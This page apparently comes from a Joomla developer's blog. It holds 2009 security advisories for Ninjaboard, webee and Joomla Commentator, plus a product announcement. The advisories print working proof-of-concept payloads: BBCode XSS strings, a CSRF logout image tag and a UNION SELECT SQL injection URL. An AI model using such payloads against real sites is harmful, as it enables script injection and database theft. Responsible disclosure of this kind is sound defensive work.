Sunday, 15 November 2009 00:00

The Joomla component Ninjaboard 0.5.0beta suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as a minor CSRF vulnerability and a minor Path Disclosure vulnerability.

  1. XSS 1: Nested [img] Tags

    [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
  2. XSS 2: JavaScript links

    [url=javascript:alert('xss');]http://google.com[/url]

    Requires minimal user interaction

  3. XSS 3: CSS Injection

    [color=#ff0000;font-size:expression(document.write(String.fromCharCode(88,83,83)))]XSS[/color]
  4. XSS 4: Nested [url] Tags

    Requires minimal user interaction, displays indications of malware, but still technically exploitable.

    [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
  5. CSRF: [img] Tags

    [img]http://victim-site.com/index.php?option=com_user&task=logout[/img]
  6. Path Disclosure: Profile View 'id' parameter

    Passing non-numeric values for the 'id' parameter of the profile page results in a Fatal Error, which reveals the full path to components/com_ninjaboard/models/profile.php.

    index.php?option=com_ninjaboard&view=profile&id='

These issues are fixed in the latest release, and users are urged to upgrade.

Timeline

  • Vulnerabilities Discovered: 14 July 2009
  • Vendor Notified: 16 July 2009
  • Vendor Response: 16 July 2009
  • Update Available: 2009
  • Disclosure: 15 November... 2009
Last Updated on Thursday, 30 September 2010 17:37
Sunday, 15 November 2009 00:00

webee 1.1.1, a Joomla commenting plugin, suffers from multiple vulnerabilities.

  1. SQL Injection

    The 'articleId' is not sanitized.
    index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 -- 
  2. [img] BBCode [color] Tag XSS

    [color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color]
  3. [url] BBCode [img] Tag XSS

    [img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]
  4. [size] BBCode [url] Tag XSS

    [url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url]

UPDATE: webee has been updated to 1.2 as of 12 November 2009 and still suffers from SQL Injection. XSS was not tested in 1.2

Timeline

  • Vulnerabilities Discovered: 4 November 2009
  • Vendor Notified: 4 November 2009
  • Vendor Notified Again: 9 November 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 15 November 2009
Last Updated on Thursday, 30 September 2010 17:35
Sunday, 15 November 2009 00:00

Joomla Commentator 1.1b3, a Joomla commenting plugin, suffers from an XSS vulnerability in its "title" field that enables attackers to possibly run scripts as an administrator.

title"/onmouseover="alert(/xss/.source)

Timeline

  • Vulnerabilities Discovered: 3 November 2009
  • Vendor Notified: 3 November 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 15 November 2009
Last Updated on Thursday, 30 September 2010 17:35
Sunday, 08 November 2009 18:56

I am proud to announce the release of JMyLife 1.0, a new Joomla component by yours truly! JMyLife aims to replicate the functionality of fmylife.com in a Joomla 1.5 native component!

There are 2 versions available: JMyLife 1.0 FREE, which has the bare essentials, and JMyLife 1.0 Pro, with all the bells and whistles!

View the demo here - JMyLife Component Demo.

Overview of Features

  Free Pro
Guest Story Submission Yes Yes
User Comment Submission Yes Yes
Story Voting Yes Yes
Story Moderation Yes Yes
Comment Moderation Yes Yes
Built-in "Share on Facebook" Link Yes Yes
User Comment Reporting Yes Yes
reCAPTCHA on Submission Form No Yes
User Favorites No Yes
Community Builder Support No Yes
Submission Module No Yes
Category Menu Module No Yes
Story/Comment Search Plugin No Yes
Cost: FREE $20

When you purchase the Pro version, ALL minor updates (until 1.1) will be included, and you will be supporting future development of this project.

Last Updated on Thursday, 12 November 2009 11:56
Friday, 06 November 2009 23:55

I was doing some restructuring to my soon-to-be-released Joomla component, JMyLife, and wanted to have a slect item in the configuration view in order to allow the admin to select a page to direct users to as a "sign up" page. I originally had this item as part of the global view parameters, but I was having issues with Menu Items overriding the global values on specific views. I started digging through the Joomla API documents, expecting to find a simple JHTML statement I could use to produce this form element, but couldn't. I ended up with a solution that works, though I wish it were a bit easier.

Last Updated on Saturday, 07 November 2009 04:19
Page 9 of 16

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions